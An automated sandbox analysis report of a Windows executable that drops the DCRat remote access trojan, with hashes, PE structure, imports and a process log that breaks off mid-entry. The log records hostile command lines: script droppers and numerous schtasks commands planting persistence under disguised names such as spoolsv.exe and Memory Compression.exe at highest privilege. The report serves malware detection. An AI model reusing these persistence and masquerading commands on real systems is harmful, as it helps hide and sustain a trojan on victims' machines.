Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Logs\SettingSync\b7ad5a7a0bb6c8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (561), with no line terminators
Category:	dropped
Size (bytes):	561
Entropy (8bit):	5.880534797294184
Encrypted:	false
SSDEEP:	12:jeYl/WRQ6Csv8UzE0qzs1e3huCHkZ8kBES+uJ/1YVvN:jDCRv8UIfUDBEYSN
MD5:	C829C2438EA1442BB094BDB8E5E97CE2
SHA1:	658C8334FB753FD76AC7373EC8A5E9738668C496
SHA-256:	1C5C59A284759D9F43C51A416ABAEBDB73C10D5A869F95B2411B5A2FAE4AA689
SHA-512:	26E942B3E1580A61549D37A97A1D7E30E341E266D9A722F258C9FC2325E975C5437A9BA486474B5A65946A0E77F9417BB1B8944C87626BDB72D586A60A321FC2
Malicious:	false
Preview:	2zXpQSn4LRQz6ZSGqhNJDw9iplsONAw7JFoI0BRoMF3EYQ7m8vR3VPfGzz9pjYrKfSq1vJQoPi6725JZoGQbt2m3khTACmEyXsiFkF1yfnnwThN3qjAcIQbmqxRN0PmmdHkKXEziPb5FP0jCTZUcmmqHQ6Ywyn7PBASL7DglucMqUVX0NO3b5JA1bd4apCtmepEOhXFQ2trJZAw4iiiktgU1AaueIG5sskMpRJSzJmjMb1caq91HdJ27VNOGnlHwx9ayyHnZPtbH6HZJ8TxJOxOjrOTD5MMhexYbanmjWb1urvAOxEITy8h9v0GjxjeDh3mJs8sVqNww6d16NFQ0E2tgPZqjgCww6yNyJ1fzWwnkLuDR8KWsTo9oKF4TRIynbAzHQDxWjbdRPIUeVYkWqDdRzioD6MhN79JL55B5W9I1LrZBvZ73ic7XghSrZtZX4QTQ9IjZXp9q5mGHJnRgOnpfCvpXnUgmku75YJBm0hg2dQb4bLhwc3JQkyONdMwDIWGLoLtAlpqqHwBvUu5cwuKqkrUk5xJnvdtHKPPPbhKxMdIyw

C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\Crashpad\reports\b7ad5a7a0bb6c8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (490), with no line terminators
Category:	dropped
Size (bytes):	490
Entropy (8bit):	5.861963529142372
Encrypted:	false
SSDEEP:	12:GvVE2mqzGXJ1TWiziPOEpZn5EW/TGB96UH3T93nj3l4x+:GvEq2P9itpZ5P/qBFRz14k
MD5:	4E686F074F37A2DC9DCB6B18D27D43C9
SHA1:	BCD72101E1A1D3404251D36DEA99B1A05A397783
SHA-256:	D969B3A22F9A3F0CBEE35939C44B89A5E68CB3CCB24B99C121E3FB2D91AF9170
SHA-512:	3705F63CFCCBFD5D4462D4C59B69D40E94976A6E2336131230864365CC0CD449ACC2503A4B51CC29723DDF7077E1A05390B3709F6CF0B858398B80B2AC8CA254
Malicious:	false
Preview:	zbGj7MbEEn8NKmBoWpKgzQQ85S52eTgTp4BP8B3majFuaK8DzGhekNojKInpQijuGpiPkvqVviFQKghuT2CYvCscQcFzXNV19VnvmtcEaMsCHXZnk3WXgL9D6G8Ip07iMNRz3wIka88iUpU3CcOe18VxVkyguTYjPJz3Gkuyuv6hNbsQvFGMlcqO1ddS7m0HjYSL0axcsauGByk41hvoNM7xclCmGb1I5z7yIhaUSndLrkND2jbZ1L3XbesOYKWRimKL0wvTHaVksvG2Y8tg9cRt6kWozM5HQMnFZCMGyHSa0TpqYz0ZbzRGVbPQZHd5eNTfIBcWvms2K03m5qP9Vgqb5gu8w6rrnX6mAJiXXenyHZ6ehmVt1ej8h1klQdjz5BOw4RmvH2m122UgkPaKk8zJx7FIj6G35y3FLJkQAjl81rGohEBBDYO6LE96MdMKwt6D9OUapJJBW1SF1alf5F0gj64HKoEgXaMIvCpTtk

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.519561804089842
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5U9CuGu1ru.exe
File size:	2'612'447 bytes
MD5:	752748b4c26423542f08b2d3bdd47a42
SHA1:	5c36c76818a268e3ba45ba9de7dab600a66f966e
SHA256:	56ec30189e1468de16c9e8d39908ca3428033e516a6d2fcb843963a4d36c43fe
SHA512:	d5b0604ba7db39fb94f49779326de8c9843c2ce8d7738b4af46028542f7f1685c9903c6961f36f63f4e9c06c7522cb237d9a94598365a44a860542f5bde8687a
SSDEEP:	49152:ubA3ji7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKice:ubI9GfP+WDNl8+azkN2
TLSH:	3AC5CE017E448A21F01D1633C2EF494447B4AC112AE6E76B7EB9376E58123937E2DADF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007F55F106FB29h
jmp 00007F55F106F53Dh
cmp ecx, dword ptr [0043E668h]
jne 00007F55F106F6B5h
ret
jmp 00007F55F106FCAEh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F55F1062447h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007F55F107284Dh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F55F10623DEh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F55F1071F62h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F55F106F654h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F55F1071F45h
int3
jmp 00007F55F1073F93h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0xdf98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0xdf98	0xe000	d4fc32bf886ae704fea4f916f9d3a59d	False	0.637451171875	data	6.661378204564432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x63644	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6418c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x65738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x65ca0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x66548	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x673f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x67858	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x68900	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6aea8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x6ec1c	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x6eea4	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x6efe0	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x6f0cc	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6f1fc	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6f534	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x6f788	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x6f96c	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x6fb38	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x6fcf0	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x6fe38	0x446	data	English	United States	0.340036563071298
RT_STRING	0x70280	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x703e8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x7053c	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x70648	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x70704	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x707dc	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70844	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.39786666666666665

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	19:26:57
Start date:	10/10/2024
Path:	C:\Users\user\Desktop\5U9CuGu1ru.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5U9CuGu1ru.exe"
Imagebase:	0x800000
File size:	2'612'447 bytes
MD5 hash:	752748B4C26423542F08B2D3BDD47A42
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:26:58
Start date:	10/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe"
Imagebase:	0x420000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	19:26:58
Start date:	10/10/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs"
Imagebase:	0x420000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:27:07
Start date:	10/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:27:07
Start date:	10/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	19:27:07
Start date:	10/10/2024
Path:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe"
Imagebase:	0x50000
File size:	2'295'296 bytes
MD5 hash:	28DD5F145AEB9F6E3D1C60BC1DE330B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2190779031.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2190779031.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2194931311.00000000126DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows multimedia platform\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Desktop\spoolsv.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 5 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 10 /tr "'C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Users\Public\Desktop\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Desktop\spoolsv.exe
Imagebase:	0x2a0000
File size:	2'295'296 bytes
MD5 hash:	28DD5F145AEB9F6E3D1C60BC1DE330B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.2270383739.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Users\Public\Desktop\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Desktop\spoolsv.exe
Imagebase:	0xf30000
File size:	2'295'296 bytes
MD5 hash:	28DD5F145AEB9F6E3D1C60BC1DE330B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2270353647.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
